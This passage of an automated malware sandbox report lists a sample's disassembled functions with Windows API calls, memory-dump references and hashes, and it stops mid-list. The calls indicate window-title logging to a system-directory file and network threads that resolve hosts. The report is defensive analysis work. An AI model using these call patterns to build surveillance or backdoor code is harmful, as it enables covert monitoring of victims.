                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$Move$CountDirectoryModuleNameSystemTickwsprintf
                                                                    • String ID: %s\%d.bak
                                                                    • API String ID: 830686190-2116986511
                                                                    • Opcode ID: 000ff4eb096c81d91c01ada470acf548624416b1241f4089cb36c338762840f1
                                                                    • Instruction ID: 9f06803c1ffaaaa31e9d9007a62f372198ec7d6cfd6c9242bac5ba9a813fd8f0
                                                                    • Opcode Fuzzy Hash: 000ff4eb096c81d91c01ada470acf548624416b1241f4089cb36c338762840f1
                                                                    • Instruction Fuzzy Hash: 50F091B680022CEBEB109B94CD8DED7777CEB19341F400192F755D2065D674AA94CFA4
                                                                    Function 1000735D Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 35libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,759183C0,00000000,00000001,?,?,10007E40), ref: 10007369
                                                                    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 10007381
                                                                    • GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 1000738B
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 1000739F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressLibraryProc$FreeLoad
                                                                    • String ID: GetCurrentProcess$IsWow64Process$kernel32.dll
                                                                    • API String ID: 2256533930-2522683910
                                                                    • Opcode ID: b70516e81cf4186ba5d59661d6084a7a46ccf6b41fbb9f1c04f2bd3a637fdcb0
                                                                    • Instruction ID: 81c69835b32c9c0caa3ea141d32f12e2a558c1f7320e50515fbff50547cedb70
                                                                    • Opcode Fuzzy Hash: b70516e81cf4186ba5d59661d6084a7a46ccf6b41fbb9f1c04f2bd3a637fdcb0
                                                                    • Instruction Fuzzy Hash: 26F03036900318FBF701D7E5DC88EAF7BACEB856E5B104119FA05A3104DB78EE019670
                                                                    Function 10003398 Relevance: 12.1, APIs: 7, Strings: 1, Instructions: 82stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: memcpymemsetstrchrstrcpystrlen
                                                                    • String ID: .
                                                                    • API String ID: 3788969630-248832578
                                                                    • Opcode ID: 3a0c8f5c45e144d5a7da8bcc08520caca3791cf6891c93a572bac5900c4e950d
                                                                    • Instruction ID: 6637a0029c5ccaeeccec9ad34e8858c5a00009970b3987beeab1a41d2f1ef73f
                                                                    • Opcode Fuzzy Hash: 3a0c8f5c45e144d5a7da8bcc08520caca3791cf6891c93a572bac5900c4e950d
                                                                    • Instruction Fuzzy Hash: A5210676800148BFEB12DFA8CC81DDF3BACDF15380F5044B6F9859B146DA70BAC58AA1
                                                                    Function 0040CA97 Relevance: 12.1, APIs: 8, Instructions: 76stringtimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040CAB1
                                                                    • GetForegroundWindow.USER32 ref: 0040CAB9
                                                                    • GetWindowTextA.USER32(00000000,1001517C,00000400), ref: 0040CAC7
                                                                    • lstrlen.KERNEL32(1001517C), ref: 0040CAF8
                                                                    • GetLocalTime.KERNEL32(?), ref: 0040CB06
                                                                    • wsprintfA.USER32 ref: 0040CB37
                                                                      • Part of subcall function 0040C9B3: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040C9CB
                                                                      • Part of subcall function 0040C9B3: _mbscat.MSVCRT ref: 0040C9DD
                                                                      • Part of subcall function 0040C9B3: _mbscat.MSVCRT ref: 0040C9EE
                                                                      • Part of subcall function 0040C9B3: _mbscat.MSVCRT ref: 0040C9FF
                                                                      • Part of subcall function 0040C9B3: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 0040CA20
                                                                      • Part of subcall function 0040C9B3: GetFileSize.KERNEL32(00000000,00000000), ref: 0040CA2E
                                                                      • Part of subcall function 0040C9B3: SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 0040CA42
                                                                      • Part of subcall function 0040C9B3: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040CA56
                                                                      • Part of subcall function 0040C9B3: WriteFile.KERNEL32(?,00000000,00000000), ref: 0040CA83
                                                                      • Part of subcall function 0040C9B3: CloseHandle.KERNEL32(?), ref: 0040CA8C
                                                                    • memset.MSVCRT ref: 0040CB53
                                                                    • memset.MSVCRT ref: 0040CB5C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$_mbscatmemset$Window$??2@CloseCreateDirectoryForegroundHandleLocalPointerSizeSystemTextTimeWritelstrlenwsprintf
                                                                    • String ID:
                                                                    • API String ID: 2409623530-0
                                                                    • Opcode ID: f8d6c230f38ba22383612dff5830827d82af052c30f29c99fbce0fb9b8c11198
                                                                    • Instruction ID: 122ea5d9abb08784235b85e3bdf3f70467fc9a5091a7e191da92d6c784d5a478
                                                                    • Opcode Fuzzy Hash: f8d6c230f38ba22383612dff5830827d82af052c30f29c99fbce0fb9b8c11198
                                                                    • Instruction Fuzzy Hash: C82132B190022CFAE7109BA9CD85FEE77BCEB08345F104062F601E6181D6799A848B79
                                                                    Function 1000448D Relevance: 12.1, APIs: 8, Instructions: 70threadstringnetworkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • inet_addr.WS2_32(?), ref: 10004498
                                                                    • gethostbyname.WS2_32(?), ref: 100044A8
                                                                    • memcpy.MSVCRT(?,?,?), ref: 100044C0
                                                                    • inet_ntoa.WS2_32(?), ref: 100044CB
                                                                    • strcpy.MSVCRT(10014E04,?), ref: 100044D7
                                                                    • CreateThread.KERNEL32(00000000,00000000,10002154,00000000,00000000,00000000), ref: 10004502
                                                                    • CloseHandle.KERNEL32(00000000), ref: 10004505
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_000042B5,00000000,00000000,00000000), ref: 1000452B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoamemcpystrcpy
                                                                    • String ID:
                                                                    • API String ID: 3029021308-0
                                                                    • Opcode ID: 15fd704f61aedeb598f957a8de6bd2aa3d9d4b812b331b19c91f3ff0da029640
                                                                    • Instruction ID: 14a4f8de758e8180cd59c3add182a1bd5b6b72836b17c2c1dafddc8ebba36152
                                                                    • Opcode Fuzzy Hash: 15fd704f61aedeb598f957a8de6bd2aa3d9d4b812b331b19c91f3ff0da029640
                                                                    • Instruction Fuzzy Hash: 67116DB550025DBFFB009FA4DCC4CAA3BECEB452E57128166F904C6265DB30DD808BA0
                                                                    Function 1000243E Relevance: 12.1, APIs: 8, Instructions: 68threadstringnetworkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • inet_addr.WS2_32(?), ref: 10002447
                                                                    • gethostbyname.WS2_32(?), ref: 10002457
                                                                    • memcpy.MSVCRT(?,?,?), ref: 1000246F
                                                                    • inet_ntoa.WS2_32(?), ref: 1000247A
                                                                    • strcpy.MSVCRT(10014E04,?), ref: 10002486
                                                                    • CreateThread.KERNEL32(00000000,00000000,10002154,00000000,00000000,00000000), ref: 100024B1
                                                                    • CloseHandle.KERNEL32(00000000), ref: 100024B4
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00002182,00000000,00000000,00000000), ref: 100024DA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoamemcpystrcpy
                                                                    • String ID:
                                                                    • API String ID: 3029021308-0
                                                                    • Opcode ID: 207dbf6156f7ae9750c0ea949908a0c05f84eaa405de875eb15c3d1023100b21
                                                                    • Instruction ID: 0836e4cfd00ad98093936f376dee9b857ec94783c65231398b13e2a878489041
                                                                    • Opcode Fuzzy Hash: 207dbf6156f7ae9750c0ea949908a0c05f84eaa405de875eb15c3d1023100b21
                                                                    • Instruction Fuzzy Hash: 9E114CB551125DBFFB009FA4DCC4CAB7BECEB452E47128125F909C6265DB30DD808BA0
                                                                    Function 1000257F Relevance: 12.1, APIs: 8, Instructions: 68threadstringnetworkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • inet_addr.WS2_32(?), ref: 10002588
                                                                    • gethostbyname.WS2_32(?), ref: 10002598
                                                                    • memcpy.MSVCRT(?,?,?), ref: 100025B0
                                                                    • inet_ntoa.WS2_32(?), ref: 100025BB
                                                                    • strcpy.MSVCRT(10014E04,?), ref: 100025C7
                                                                    • CreateThread.KERNEL32(00000000,00000000,10002154,00000000,00000000,00000000), ref: 100025F2
                                                                    • CloseHandle.KERNEL32(00000000), ref: 100025F5
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_000024EB,00000000,00000000,00000000), ref: 1000261B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoamemcpystrcpy
                                                                    • String ID:
                                                                    • API String ID: 3029021308-0
                                                                    • Opcode ID: a20b5c5aa59c1b7a6321889774c18a137dc56c09a8d48e34c438cb1db4a4545e
                                                                    • Instruction ID: b1e4198e81bfd14cfa6f4f13ef54cf70b0541512587501247ef1c7faa2b0750c
                                                                    • Opcode Fuzzy Hash: a20b5c5aa59c1b7a6321889774c18a137dc56c09a8d48e34c438cb1db4a4545e
                                                                    • Instruction Fuzzy Hash: F5113AB550125DBFFB009F64DCC4CAA3BECEB452E97168525F909C6265DB31ED808B60
                                                                    Function 1000298A Relevance: 12.1, APIs: 8, Instructions: 68threadstringnetworkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • inet_addr.WS2_32(?), ref: 10002993
                                                                    • gethostbyname.WS2_32(?), ref: 100029A3
                                                                    • memcpy.MSVCRT(?,?,?), ref: 100029BB
                                                                    • inet_ntoa.WS2_32(?), ref: 100029C6
                                                                    • strcpy.MSVCRT(10014E04,?), ref: 100029D2
                                                                    • CreateThread.KERNEL32(00000000,00000000,10002154,00000000,00000000,00000000), ref: 100029FD
                                                                    • CloseHandle.KERNEL32(00000000), ref: 10002A00
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_0000262C,00000000,00000000,00000000), ref: 10002A26
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoamemcpystrcpy
                                                                    • String ID:
                                                                    • API String ID: 3029021308-0
                                                                    • Opcode ID: 73946dd1ed635aaed5d9fc3eba51c00ca56951c10eba8772daa6a168a1d4be54
                                                                    • Instruction ID: f2d2ae79ef2310ba39c191fe81277ec11656710e91ca79f84affb2153a851795
                                                                    • Opcode Fuzzy Hash: 73946dd1ed635aaed5d9fc3eba51c00ca56951c10eba8772daa6a168a1d4be54
                                                                    • Instruction Fuzzy Hash: BF1128B5500259BFFB00EFA4DCC4CAA7BECEB452E47168126F909C6265DB31DD808AA0
                                                                    Function 10004209 Relevance: 12.1, APIs: 8, Instructions: 67threadstringnetworkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • inet_addr.WS2_32(?), ref: 10004211
                                                                    • gethostbyname.WS2_32(?), ref: 10004221
                                                                    • memcpy.MSVCRT(?,?,?), ref: 10004239
                                                                    • inet_ntoa.WS2_32(?), ref: 10004244
                                                                    • strcpy.MSVCRT(10014E04,?), ref: 10004250
                                                                    • CreateThread.KERNEL32(00000000,00000000,10002154,00000000,00000000,00000000), ref: 1000427B
                                                                    • CloseHandle.KERNEL32(00000000), ref: 1000427E
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00003F3F,00000000,00000000,00000000), ref: 100042A4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoamemcpystrcpy
                                                                    • String ID:
                                                                    • API String ID: 3029021308-0
                                                                    • Opcode ID: a44a375f6a8b32d37d3c03423036b1d324b3c4b26bf052f3683a838cedc6308e
                                                                    • Instruction ID: 7a775bfb32ac43c14abc640d24b1e613131a7944075001317151d0b1adf055ba
                                                                    • Opcode Fuzzy Hash: a44a375f6a8b32d37d3c03423036b1d324b3c4b26bf052f3683a838cedc6308e
                                                                    • Instruction Fuzzy Hash: 43113AB5501259BFFB009FA4DCC4CAA3BECEB452E47528125F908C6265DB30ED808BA0
                                                                    Function 1000243F Relevance: 12.1, APIs: 8, Instructions: 67threadstringnetworkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • inet_addr.WS2_32(?), ref: 10002447
                                                                    • gethostbyname.WS2_32(?), ref: 10002457
                                                                    • memcpy.MSVCRT(?,?,?), ref: 1000246F
                                                                    • inet_ntoa.WS2_32(?), ref: 1000247A
                                                                    • strcpy.MSVCRT(10014E04,?), ref: 10002486
                                                                    • CreateThread.KERNEL32(00000000,00000000,10002154,00000000,00000000,00000000), ref: 100024B1
                                                                    • CloseHandle.KERNEL32(00000000), ref: 100024B4
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00002182,00000000,00000000,00000000), ref: 100024DA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoamemcpystrcpy
                                                                    • String ID:
                                                                    • API String ID: 3029021308-0
                                                                    • Opcode ID: 3a3526ed159d7f5ac779b0d573e5ebaa7c8c2fb1ced333f1a1d30844a41c343d
                                                                    • Instruction ID: 3cd5014a03220cdb8a973b1951cb30bd2a6bc50cce7a351b1078e88735e0dbb8
                                                                    • Opcode Fuzzy Hash: 3a3526ed159d7f5ac779b0d573e5ebaa7c8c2fb1ced333f1a1d30844a41c343d
                                                                    • Instruction Fuzzy Hash: 241148B551125DBFFB009FA4DCC4CAA7BECEB452E47128125F909C6265DB30ED808BA0
                                                                    Function 10003E56 Relevance: 12.1, APIs: 8, Instructions: 67threadstringnetworkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • inet_addr.WS2_32(?), ref: 10003E5E
                                                                    • gethostbyname.WS2_32(?), ref: 10003E6E
                                                                    • memcpy.MSVCRT(?,?,?), ref: 10003E86
                                                                    • inet_ntoa.WS2_32(?), ref: 10003E91
                                                                    • strcpy.MSVCRT(10014E04,?), ref: 10003E9D
                                                                    • CreateThread.KERNEL32(00000000,00000000,10002154,00000000,00000000,00000000), ref: 10003EC8
                                                                    • CloseHandle.KERNEL32(00000000), ref: 10003ECB
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00003C1C,00000000,00000000,00000000), ref: 10003EF1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoamemcpystrcpy
                                                                    • String ID:
                                                                    • API String ID: 3029021308-0
                                                                    • Opcode ID: e2b85ed8c11d759cc47533073b6a14df5c76b3f864717abf25221df46cf5fb2b
                                                                    • Instruction ID: fcce369f2235ded2d9048499b47ce3f3240e151dc24d88ed4d2a802bd4162794
                                                                    • Opcode Fuzzy Hash: e2b85ed8c11d759cc47533073b6a14df5c76b3f864717abf25221df46cf5fb2b
                                                                    • Instruction Fuzzy Hash: D71128B550029DBFFB019F64DCC4CAB7BECEB452E47118125F905C62A5DB71ED808B60
                                                                    Function 10004490 Relevance: 12.1, APIs: 8, Instructions: 67threadstringnetworkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • inet_addr.WS2_32(?), ref: 10004498
                                                                    • gethostbyname.WS2_32(?), ref: 100044A8
                                                                    • memcpy.MSVCRT(?,?,?), ref: 100044C0
                                                                    • inet_ntoa.WS2_32(?), ref: 100044CB
                                                                    • strcpy.MSVCRT(10014E04,?), ref: 100044D7
                                                                    • CreateThread.KERNEL32(00000000,00000000,10002154,00000000,00000000,00000000), ref: 10004502
                                                                    • CloseHandle.KERNEL32(00000000), ref: 10004505
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_000042B5,00000000,00000000,00000000), ref: 1000452B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoamemcpystrcpy
                                                                    • String ID:
                                                                    • API String ID: 3029021308-0
                                                                    • Opcode ID: 0f4604f025ca16299efcc2b5abd4868c8d69b7b5e1f81785b7c2dfc63795e826
                                                                    • Instruction ID: 152a90106a10d9f6933b557cad83f0a83f019aca5d54440c9d3868692228c9c7
                                                                    • Opcode Fuzzy Hash: 0f4604f025ca16299efcc2b5abd4868c8d69b7b5e1f81785b7c2dfc63795e826
                                                                    • Instruction Fuzzy Hash: 81113DB550125DBFFB009FA4DCC4CAA3BECEB452E57128565F904C6265DB70DD808B60
                                                                    Function 10004706 Relevance: 12.1, APIs: 8, Instructions: 67threadstringnetworkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • inet_addr.WS2_32(?), ref: 1000470E
                                                                    • gethostbyname.WS2_32(?), ref: 1000471E
                                                                    • memcpy.MSVCRT(?,?,?), ref: 10004736
                                                                    • inet_ntoa.WS2_32(?), ref: 10004741
                                                                    • strcpy.MSVCRT(10014E04,?), ref: 1000474D
                                                                    • CreateThread.KERNEL32(00000000,00000000,10002154,00000000,00000000,00000000), ref: 10004778
                                                                    • CloseHandle.KERNEL32(00000000), ref: 1000477B
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_0000453C,00000000,00000000,00000000), ref: 100047A1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoamemcpystrcpy
                                                                    • String ID:
                                                                    • API String ID: 3029021308-0
                                                                    • Opcode ID: 6493bf8843dc290fb4396dfcf6482e2c31f5c838a3d30255e9b01652ef6ba7f9
                                                                    • Instruction ID: b07fb4e7fcf8aad133efbee6d2bff36546558eae7963b8b8def562a48d110def
                                                                    • Opcode Fuzzy Hash: 6493bf8843dc290fb4396dfcf6482e2c31f5c838a3d30255e9b01652ef6ba7f9
                                                                    • Instruction Fuzzy Hash: ED1136B550425DBFFB009FA4DCC4CAA3BECEB452E47128125F908CA265DB30ED808BA0
                                                                    Function 10002580 Relevance: 12.1, APIs: 8, Instructions: 67threadstringnetworkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • inet_addr.WS2_32(?), ref: 10002588
                                                                    • gethostbyname.WS2_32(?), ref: 10002598
                                                                    • memcpy.MSVCRT(?,?,?), ref: 100025B0
                                                                    • inet_ntoa.WS2_32(?), ref: 100025BB
                                                                    • strcpy.MSVCRT(10014E04,?), ref: 100025C7
                                                                    • CreateThread.KERNEL32(00000000,00000000,10002154,00000000,00000000,00000000), ref: 100025F2
                                                                    • CloseHandle.KERNEL32(00000000), ref: 100025F5
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_000024EB,00000000,00000000,00000000), ref: 1000261B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoamemcpystrcpy
                                                                    • String ID:
                                                                    • API String ID: 3029021308-0
                                                                    • Opcode ID: 57f54bb60699ed109542a624fa8abe98603303e75bf271e062f7e88050f24bf1
                                                                    • Instruction ID: 629364bdcd34cfa53ab5f708bcafb15ef3074922faf6b1aae38d232b2a9931fa
                                                                    • Opcode Fuzzy Hash: 57f54bb60699ed109542a624fa8abe98603303e75bf271e062f7e88050f24bf1
                                                                    • Instruction Fuzzy Hash: 6D113AB5501259BFFB009F64DCC4CAA3BECEB452E57168525F909C6265DB31ED808B60
                                                                    Function 1000298B Relevance: 12.1, APIs: 8, Instructions: 67threadstringnetworkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • inet_addr.WS2_32(?), ref: 10002993
                                                                    • gethostbyname.WS2_32(?), ref: 100029A3
                                                                    • memcpy.MSVCRT(?,?,?), ref: 100029BB
                                                                    • inet_ntoa.WS2_32(?), ref: 100029C6
                                                                    • strcpy.MSVCRT(10014E04,?), ref: 100029D2
                                                                    • CreateThread.KERNEL32(00000000,00000000,10002154,00000000,00000000,00000000), ref: 100029FD
